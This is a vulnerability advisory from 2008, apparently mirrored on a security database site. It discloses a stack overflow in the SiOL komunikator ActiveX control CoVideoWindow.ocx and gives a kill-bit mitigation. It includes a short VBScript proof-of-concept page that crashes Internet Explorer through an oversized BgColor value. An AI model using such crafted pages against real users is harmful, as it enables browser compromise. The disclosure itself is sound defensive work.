Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

siol-overflow.txt

🗓️ 29 Jul 2008 00:00:00Reported by Edi StrosarType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

SiOL komunikator ActiveX stack overflow, allows remote code execution on SiOL komunikator v1.3 (SLO_71130

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`=========================================================================  
  
SiOL komunikator IM ActiveX stack overflow condition  
  
=========================================================================  
  
Release date: 30.7.2008  
Severity: Moderately critical  
Impact: Stack overflow  
Remote: Yes  
Status: Unpatched  
Software: SiOL Komunikator v1.3 (SLO_71130)  
Tested on: Microsoft Windows XP SP3 / IE6 SP3  
Developer: http://www.siol.net/  
http://www.eyeball.com/  
Disclosed by: Edi Strosar  
  
  
Vendor's description of affected application:  
=============================================  
"SiOL komunikator je programska oprema za neposredno sporoèanje, ki podpira celovito komuniciranje s tekstovnimi sporoèili, izmenjavo datotek ter možnostjo glasovnih in video klicev, brez telefonskega aparata in s katerekoli lokacije, kjer je omogoèena povezava v Internet."  
  
English translation (sort of):  
SiOL komunikator is an instant messaging (IM) application based on Eyeball Communicator offered by SiOL (Slovenia On-Line) ISP.  
  
Download link:  
http://www.siol.net/spletne_storitve/siol_komunikator.aspx  
  
  
ActiveX control overview:  
=========================  
Developer: Eyeball Networks, Inc.  
Version: 5.0.907.1  
Component: CoVideoWindow.ocx  
GUID: {CA06EE71-7348-44C4-9540-AAF0E6BD1515}  
RegKey Safe for Script: False  
RegKey Safe for Init: False  
Implements IObjectSafety: True  
KillBitSet: False  
  
  
Description:  
============  
SiOL komunikator's ActiveX component CoVideoWindow.ocx is susceptible to stack overflow condition in BgColor() method which may lead to remote code execution. The vulnerability could be exploited if user with SiOL komunikator installed visits a specialy crafted web page.  
  
  
Proof of concept:  
=================  
Following testcase will crash Internet Explorer:  
  
<html>  
<object classid='clsid:CA06EE71-7348-44c4-9540-AAF0E6BD1515' id='test'></object>  
<input language=VBScript onclick=buffero() type=button value="Crash">  
<script language = 'vbscript'>  
Sub buffero()  
  
crash = String(515000, unescape("%41"))  
test.BgColor = crash  
End Sub  
  
</script>  
</html>  
  
Note: close all Internet Explorer instances before executing PoC!  
  
Tested with SiOL komunikator v1.3 (SLO_71130). Other versions may be affected.  
  
  
Exception overview:  
===================  
----------------------------------------------------------------  
Exception C00000FD (STACK_OVERFLOW)  
----------------------------------------------------------------  
EAX=00000774: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  
EBX=00000003: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  
ECX=000428F4: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  
EDX=000FB770: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  
ESP=0013D8EC: C6 9A 80 7C 0D B9 E8 01-00 00 00 00 20 39 EC 01  
EBP=0013D904: 44 D9 13 00 1C 9F E8 01-1C D9 13 00 24 00 39 02  
ESI=000FB772: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  
EDI=02390024: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  
EIP=01E93635: 85 01 3D 00 10 00 00 73-EC 2B C8 8B C4 85 01 8B  
--> TEST [ECX],EAX  
----------------------------------------------------------------  
  
  
Mitigation:  
===========  
Set the kill bit (http://support.microsoft.com/kb/240797).  
  
Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.  
  
Windows Registry Editor Version 5.00  
  
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CA06EE71-7348-44c4-9540-AAF0E6BD1515}]  
"Compatibility Flags"=dword:00000400  
  
  
Timeline:  
=========  
12.07.2008 - initial developer notification  
- no response  
20.07.2008 - additional developer notification  
- no response  
30.07.2008 - public disclosure  
  
  
Contact:  
========  
edi [dot] strosar [at] gmail [dot] com  
  
  
Disclaimer:  
===========  
The content of this report is purely informational and meant for educational purposes only. Author shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. Any use of information in this advisory is entirely at user's own risk.  
  
=========================================================================`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
29 Jul 2008 00:00Current
7.4High risk
Vulners AI Score7.4
siol komunikatoractivex stack overflowremote code executionsiol v1.3microsoft windows xpinternet explorereyeball networksvulnerabilitypocstack overflowstack overflow mitigationdeveloper notificationpublic disclosurecontact email
22
.json
Report